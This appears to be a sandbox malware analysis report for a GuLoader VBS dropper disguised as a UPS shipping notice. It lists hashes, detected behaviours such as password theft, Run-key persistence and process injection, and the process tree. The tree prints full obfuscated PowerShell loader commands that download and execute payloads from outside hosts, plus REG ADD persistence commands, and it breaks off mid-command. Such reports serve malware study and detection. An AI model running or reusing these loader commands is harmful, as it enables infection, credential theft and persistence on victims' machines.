guloader | 4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf

Analysis

max time kernel
147s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27-06-2024 07:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Size

187KB
MD5

a408481803f47324f6479a3b70ad763b
SHA1

1a3232aeec010ce287ea65dd1a24255f95470d48
SHA256

4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf
SHA512

aab87aee34a0c93381fb0fb926edc137ffced40bba470b15dd45b798aeab9117f5a4daf30932dccef13c5c898d80f626e18a1a65d8c10b2c111319bb781f341e
SSDEEP

3072:dmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZg:d08GxbKja3+DCbKCvBB/WnHXC/sLJFJN

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/3632-81-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral2/memory/2728-79-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral2/memory/3632-81-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral2/memory/2728-79-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3632-81-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/628-87-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2728-79-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

flow pid process

3 3424 WScript.exe
12 3420 powershell.exe
63 2328 powershell.exe

flow	pid	process
3	3424	WScript.exe
12	3420	powershell.exe
63	2328	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Superprogrammrernes = "%Telefonledningernes% -w 1 $Laminae=(Get-ItemProperty -Path 'HKCU:\\Fornjelig\\').Beepers146;%Telefonledningernes% ($Laminae)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rollingerne = "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\\overdeferential\\').retoucheres;%Montuvio% ($Lkapsler)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs

Processes:

wab.exewab.exe

pid process

4188 wab.exe
4188 wab.exe
3724 wab.exe
3724 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

powershell.exewab.exepowershell.exewab.exe

pid process

3384 powershell.exe
4188 wab.exe
2936 powershell.exe
3724 wab.exe

pid	process
4188	wab.exe
4188	wab.exe
3724	wab.exe
3724	wab.exe

pid	process
3384	powershell.exe
4188	wab.exe
2936	powershell.exe
3724	wab.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

powershell.exewab.exepowershell.exe

description	pid	process	target process
PID 3384 set thread context of 4188	3384	powershell.exe	wab.exe
PID 4188 set thread context of 2728	4188	wab.exe	wab.exe
PID 4188 set thread context of 3632	4188	wab.exe	wab.exe
PID 4188 set thread context of 628	4188	wab.exe	wab.exe
PID 2936 set thread context of 3724	2936	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

wab.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings wab.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3496 reg.exe
4172 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings	wab.exe

pid	process
3496	reg.exe
4172	reg.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.exepowershell.exewab.exewab.exepowershell.exewab.exe

pid	process
3420	powershell.exe
3420	powershell.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
2328	powershell.exe
2328	powershell.exe
2728	wab.exe
2728	wab.exe
628	wab.exe
628	wab.exe
2728	wab.exe
2728	wab.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe
3724	wab.exe

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exewab.exepowershell.exe

pid process

3384 powershell.exe
4188 wab.exe
4188 wab.exe
4188 wab.exe
4188 wab.exe
2936 powershell.exe

pid	process
3384	powershell.exe
4188	wab.exe
4188	wab.exe
4188	wab.exe
4188	wab.exe
2936	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exewab.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	628	wab.exe
Token: SeDebugPrivilege	2936	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

4188 wab.exe

pid	process
4188	wab.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 3424 wrote to memory of 3420	3424	WScript.exe	powershell.exe
PID 3424 wrote to memory of 3420	3424	WScript.exe	powershell.exe
PID 3420 wrote to memory of 624	3420	powershell.exe	cmd.exe
PID 3420 wrote to memory of 624	3420	powershell.exe	cmd.exe
PID 3420 wrote to memory of 3384	3420	powershell.exe	powershell.exe
PID 3420 wrote to memory of 3384	3420	powershell.exe	powershell.exe
PID 3420 wrote to memory of 3384	3420	powershell.exe	powershell.exe
PID 3384 wrote to memory of 1748	3384	powershell.exe	cmd.exe
PID 3384 wrote to memory of 1748	3384	powershell.exe	cmd.exe
PID 3384 wrote to memory of 1748	3384	powershell.exe	cmd.exe
PID 3384 wrote to memory of 4188	3384	powershell.exe	wab.exe
PID 3384 wrote to memory of 4188	3384	powershell.exe	wab.exe
PID 3384 wrote to memory of 4188	3384	powershell.exe	wab.exe
PID 3384 wrote to memory of 4188	3384	powershell.exe	wab.exe
PID 3384 wrote to memory of 4188	3384	powershell.exe	wab.exe
PID 4188 wrote to memory of 5116	4188	wab.exe	cmd.exe
PID 4188 wrote to memory of 5116	4188	wab.exe	cmd.exe
PID 4188 wrote to memory of 5116	4188	wab.exe	cmd.exe
PID 5116 wrote to memory of 3496	5116	cmd.exe	reg.exe
PID 5116 wrote to memory of 3496	5116	cmd.exe	reg.exe
PID 5116 wrote to memory of 3496	5116	cmd.exe	reg.exe
PID 4188 wrote to memory of 4232	4188	wab.exe	WScript.exe
PID 4188 wrote to memory of 4232	4188	wab.exe	WScript.exe
PID 4188 wrote to memory of 4232	4188	wab.exe	WScript.exe
PID 4232 wrote to memory of 2328	4232	WScript.exe	powershell.exe
PID 4232 wrote to memory of 2328	4232	WScript.exe	powershell.exe
PID 4232 wrote to memory of 2328	4232	WScript.exe	powershell.exe
PID 4188 wrote to memory of 3504	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 3504	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 3504	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 2728	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 2728	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 2728	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 2728	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 3632	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 3632	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 3632	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 3632	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 628	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 628	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 628	4188	wab.exe	wab.exe
PID 4188 wrote to memory of 628	4188	wab.exe	wab.exe
PID 2328 wrote to memory of 4224	2328	powershell.exe	cmd.exe
PID 2328 wrote to memory of 4224	2328	powershell.exe	cmd.exe
PID 2328 wrote to memory of 4224	2328	powershell.exe	cmd.exe
PID 2328 wrote to memory of 2936	2328	powershell.exe	powershell.exe
PID 2328 wrote to memory of 2936	2328	powershell.exe	powershell.exe
PID 2328 wrote to memory of 2936	2328	powershell.exe	powershell.exe
PID 2936 wrote to memory of 3356	2936	powershell.exe	cmd.exe
PID 2936 wrote to memory of 3356	2936	powershell.exe	cmd.exe
PID 2936 wrote to memory of 3356	2936	powershell.exe	cmd.exe
PID 2936 wrote to memory of 3724	2936	powershell.exe	wab.exe
PID 2936 wrote to memory of 3724	2936	powershell.exe	wab.exe
PID 2936 wrote to memory of 3724	2936	powershell.exe	wab.exe
PID 2936 wrote to memory of 3724	2936	powershell.exe	wab.exe
PID 2936 wrote to memory of 3724	2936	powershell.exe	wab.exe
PID 3724 wrote to memory of 1352	3724	wab.exe	cmd.exe
PID 3724 wrote to memory of 1352	3724	wab.exe	cmd.exe
PID 3724 wrote to memory of 1352	3724	wab.exe	cmd.exe
PID 1352 wrote to memory of 4172	1352	cmd.exe	reg.exe
PID 1352 wrote to memory of 4172	1352	cmd.exe	reg.exe
PID 1352 wrote to memory of 4172	1352	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3 Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3';$Betnkelighederne = 1;Function Fellatrices($Trucing){$Farcically232=$Trucing.Length-$Betnkelighederne;$Leukocytotic64='SUBSTRIN';$Leukocytotic64+='G';For( $gracileness=1;$gracileness -lt $Farcically232;$gracileness+=2){$Alcoa+=$Trucing.$Leukocytotic64.Invoke( $gracileness, $Betnkelighederne);}$Alcoa;}function Interalar47($Weather){ . ($Terrnlbets253) ($Weather);}$talesituationens=Fellatrices ' MFo zsiKl.lNa / 5..D0. H( WSilnNd.o w sI NDT .1 0F. 0H;N TW.iTn 6h4R; Sx.6L4.;C RrAv :S1i2M1S.C0S)R BGAeTc k oA/ 2.0D1R0 0.1Y0,1 ,F iCrDeRfFo xL/H1f2S1T. 0E ';$Stilkunstnernes=Fellatrices 'FUUsleOrU-HATgTe n t ';$Frisvmmere=Fellatrices '.h,tit.pBs :./K/le.vCoTlEu xPc.o nSt.a baiFl i dnaVd.eO. c o mR.Kb.rC/pbLr,/,K osn kBuDrKr eTnTc,eCe vNn.eFn,.Fd wKpK> hWtNtIpR:B/ / 9 4v..1 5B6 . 7G9...2D1s1P/ K.oFn kCuUrBr eTnOcTe,eRvvn ePn .Od wUp ';$Constantia228=Fellatrices 'E>R ';$Terrnlbets253=Fellatrices 'TiSe xR ';$Yearock='Maney';$Smittle = Fellatrices ' eAcNh o, V%.a p pCdSa t,aw% \,RDe p,s e,tB.BKAb m. C&,&. ,ePcNhNo, At ';Interalar47 (Fellatrices 'P$UgMlPoRb aIlB:SL iPbPeBlElAi,sNts=.(ScAmId, S/ cL P$ S.m iPt tPl,e )A ');Interalar47 (Fellatrices ' $ g l oFb.a.l.:,CmiSsTt o pVh,ohr.iTc =.$ F,r.iUs.vVm mFeDrTeF. sMpsl i t,(B$ICto nVsTtAaRn tKina.2 2 8,) ');Interalar47 (Fellatrices 'p[VN e.t.. SSeKr,v iTckeSPFoOiCnSt MSaFn.a gdeSr ],:F: SAeCcIuIr.iEt ySP rLoTtEo cTo lT .=F K[ N,eUti.,SAe,c u r i tAyRPKr o t o,c opl TAy pue ]U:W: Tal s 1,2 ');$Frisvmmere=$Cistophoric[0];$Snidely= (Fellatrices ' $DgKl,o,bBa.lP: pTr.oVpNeMl lNeSrCsC=.NBeBw.-BOUb jIeGc t, SAy s tAeFm..DNEe tH.AWPePb,CLl iTe n t');$Snidely+=$Libellist[1];Interalar47 ($Snidely);Interalar47 (Fellatrices 'H$SpCrToEpde lElDeSrLsR.TH e a d eVr sB[k$ S.tUi lNk.uFnUsNt nAeNr nbeHs ],= $EtPa lKe sFiStTuSaBtBi o n eAn s ');$Hotheartedness=Fellatrices 'C$ pDr,oDpeeSlClPe,r s.. D o.w n,lSo aPdFFBiFlAeH( $UFUr.i sVvMm m eprSeE, $LFUo rSb iFs,e t,e s.)L ';$Forbisetes=$Libellist[0];Interalar47 (Fellatrices 'F$Kg lSoSb a l : I,n dVu,s.tOrBiPm.i nsi sstBrCe.nBeDs,=U(PTNe.sWt - PAaItSh. S$ F oPrObSi,s.e t.e sI). ');while (!$Industriministrenes) {Interalar47 (Fellatrices '.$ g lPo.b aMl,: b,aFgFtSa laeMr =S$GtArSu.e ') ;Interalar47 $Hotheartedness;Interalar47 (Fellatrices ' Smt.a rMtC- S lLeZeDps 4R ');Interalar47 (Fellatrices ' $ gEl o,bNaBl :PIsn d,u sVtUr i m iRn i s t r ecnEe sD= (,TRe sPtA-LPLa t h $ F oBrUbLi,s,e t,e sS)r ') ;Interalar47 (Fellatrices ' $DgNlCo bDaOlR:RE v n.e sAv.aBgv=,$ g,l,oBb,aIla:.RFegs t.aKu rSa nPtTe,rKnSe.+G+ % $EC,i swtKoUpchGo.rSiscS.NcNo,uLnLt, ') ;$Frisvmmere=$Cistophoric[$Evnesvag];}$Knallertfreren=362845;$tolkningsrammerne=26102;Interalar47 (Fellatrices 'P$,gOlCo bNa.lH: Ldy.nDgDb y,a c e a.e, U= NGRe tl-SCEoTn t.e n t. D$ FIo r bLiEs eAt e s ');Interalar47 (Fellatrices ' $Tgwl,o,bBaSl : P.e,lEoOrKi,aKn T= [RSTy sPt,ePmS. C.oSn,vIe.rSt ].:R:.F r o.mGBVa sFeC6 4 S tVrNiBn gI(A$ILAyHnVgIb y a c eCaHe ). ');Interalar47 (Fellatrices 'F$Mg l oPbOa,lO:CT j eMnTeLsAtAeWm nBd eFn eLs, =S .[RSGy.s t eemK.MT eKx.t . E,nScOo.d.i nMg,],:A:LADSRCAIUIB. G eSt S,tPrFiIn g,(a$,Pse,l oCrFiMaSn )B ');Interalar47 (Fellatrices 'M$FgSl.oSb a.l :PF o rHdBr.iAnPgNsBh a,v.e.r.eC1,8K0.= $CT.j.ePn.eSs tDeSmVn d e nUeBs .psFu bSsFt,r iAn,gB( $,K,n.aFlIl.eAr.t f,rOe.r,e n ,,$VtEoOl,kGnGiun g sBr aIm.mBe,rAn e.) ');Interalar47 $Fordringshavere180;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Repset.Kbm && echo t"
3⤵
PID:624

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3 Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3';$Betnkelighederne = 1;Function Fellatrices($Trucing){$Farcically232=$Trucing.Length-$Betnkelighederne;$Leukocytotic64='SUBSTRIN';$Leukocytotic64+='G';For( $gracileness=1;$gracileness -lt $Farcically232;$gracileness+=2){$Alcoa+=$Trucing.$Leukocytotic64.Invoke( $gracileness, $Betnkelighederne);}$Alcoa;}function Interalar47($Weather){ . ($Terrnlbets253) ($Weather);}$talesituationens=Fellatrices ' MFo zsiKl.lNa / 5..D0. H( WSilnNd.o w sI NDT .1 0F. 0H;N TW.iTn 6h4R; Sx.6L4.;C RrAv :S1i2M1S.C0S)R BGAeTc k oA/ 2.0D1R0 0.1Y0,1 ,F iCrDeRfFo xL/H1f2S1T. 0E ';$Stilkunstnernes=Fellatrices 'FUUsleOrU-HATgTe n t ';$Frisvmmere=Fellatrices '.h,tit.pBs :./K/le.vCoTlEu xPc.o nSt.a baiFl i dnaVd.eO. c o mR.Kb.rC/pbLr,/,K osn kBuDrKr eTnTc,eCe vNn.eFn,.Fd wKpK> hWtNtIpR:B/ / 9 4v..1 5B6 . 7G9...2D1s1P/ K.oFn kCuUrBr eTnOcTe,eRvvn ePn .Od wUp ';$Constantia228=Fellatrices 'E>R ';$Terrnlbets253=Fellatrices 'TiSe xR ';$Yearock='Maney';$Smittle = Fellatrices ' eAcNh o, V%.a p pCdSa t,aw% \,RDe p,s e,tB.BKAb m. C&,&. ,ePcNhNo, At ';Interalar47 (Fellatrices 'P$UgMlPoRb aIlB:SL iPbPeBlElAi,sNts=.(ScAmId, S/ cL P$ S.m iPt tPl,e )A ');Interalar47 (Fellatrices ' $ g l oFb.a.l.:,CmiSsTt o pVh,ohr.iTc =.$ F,r.iUs.vVm mFeDrTeF. sMpsl i t,(B$ICto nVsTtAaRn tKina.2 2 8,) ');Interalar47 (Fellatrices 'p[VN e.t.. SSeKr,v iTckeSPFoOiCnSt MSaFn.a gdeSr ],:F: SAeCcIuIr.iEt ySP rLoTtEo cTo lT .=F K[ N,eUti.,SAe,c u r i tAyRPKr o t o,c opl TAy pue ]U:W: Tal s 1,2 ');$Frisvmmere=$Cistophoric[0];$Snidely= (Fellatrices ' $DgKl,o,bBa.lP: pTr.oVpNeMl lNeSrCsC=.NBeBw.-BOUb jIeGc t, SAy s tAeFm..DNEe tH.AWPePb,CLl iTe n t');$Snidely+=$Libellist[1];Interalar47 ($Snidely);Interalar47 (Fellatrices 'H$SpCrToEpde lElDeSrLsR.TH e a d eVr sB[k$ S.tUi lNk.uFnUsNt nAeNr nbeHs ],= $EtPa lKe sFiStTuSaBtBi o n eAn s ');$Hotheartedness=Fellatrices 'C$ pDr,oDpeeSlClPe,r s.. D o.w n,lSo aPdFFBiFlAeH( $UFUr.i sVvMm m eprSeE, $LFUo rSb iFs,e t,e s.)L ';$Forbisetes=$Libellist[0];Interalar47 (Fellatrices 'F$Kg lSoSb a l : I,n dVu,s.tOrBiPm.i nsi sstBrCe.nBeDs,=U(PTNe.sWt - PAaItSh. S$ F oPrObSi,s.e t.e sI). ');while (!$Industriministrenes) {Interalar47 (Fellatrices '.$ g lPo.b aMl,: b,aFgFtSa laeMr =S$GtArSu.e ') ;Interalar47 $Hotheartedness;Interalar47 (Fellatrices ' Smt.a rMtC- S lLeZeDps 4R ');Interalar47 (Fellatrices ' $ gEl o,bNaBl :PIsn d,u sVtUr i m iRn i s t r ecnEe sD= (,TRe sPtA-LPLa t h $ F oBrUbLi,s,e t,e sS)r ') ;Interalar47 (Fellatrices ' $DgNlCo bDaOlR:RE v n.e sAv.aBgv=,$ g,l,oBb,aIla:.RFegs t.aKu rSa nPtTe,rKnSe.+G+ % $EC,i swtKoUpchGo.rSiscS.NcNo,uLnLt, ') ;$Frisvmmere=$Cistophoric[$Evnesvag];}$Knallertfreren=362845;$tolkningsrammerne=26102;Interalar47 (Fellatrices 'P$,gOlCo bNa.lH: Ldy.nDgDb y,a c e a.e, U= NGRe tl-SCEoTn t.e n t. D$ FIo r bLiEs eAt e s ');Interalar47 (Fellatrices ' $Tgwl,o,bBaSl : P.e,lEoOrKi,aKn T= [RSTy sPt,ePmS. C.oSn,vIe.rSt ].:R:.F r o.mGBVa sFeC6 4 S tVrNiBn gI(A$ILAyHnVgIb y a c eCaHe ). ');Interalar47 (Fellatrices 'F$Mg l oPbOa,lO:CT j eMnTeLsAtAeWm nBd eFn eLs, =S .[RSGy.s t eemK.MT eKx.t . E,nScOo.d.i nMg,],:A:LADSRCAIUIB. G eSt S,tPrFiIn g,(a$,Pse,l oCrFiMaSn )B ');Interalar47 (Fellatrices 'M$FgSl.oSb a.l :PF o rHdBr.iAnPgNsBh a,v.e.r.eC1,8K0.= $CT.j.ePn.eSs tDeSmVn d e nUeBs .psFu bSsFt,r iAn,gB( $,K,n.aFlIl.eAr.t f,rOe.r,e n ,,$VtEoOl,kGnGiun g sBr aIm.mBe,rAn e.) ');Interalar47 $Fordringshavere180;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Repset.Kbm && echo t"
4⤵
PID:1748

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Superprogrammrernes" /t REG_EXPAND_SZ /d "%Telefonledningernes% -w 1 $Laminae=(Get-ItemProperty -Path 'HKCU:\Fornjelig\').Beepers146;%Telefonledningernes% ($Laminae)"
5⤵
- Suspicious use of WriteProcessMemory
PID:5116

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Superprogrammrernes" /t REG_EXPAND_SZ /d "%Telefonledningernes% -w 1 $Laminae=(Get-ItemProperty -Path 'HKCU:\Fornjelig\').Beepers146;%Telefonledningernes% ($Laminae)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:3496

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl 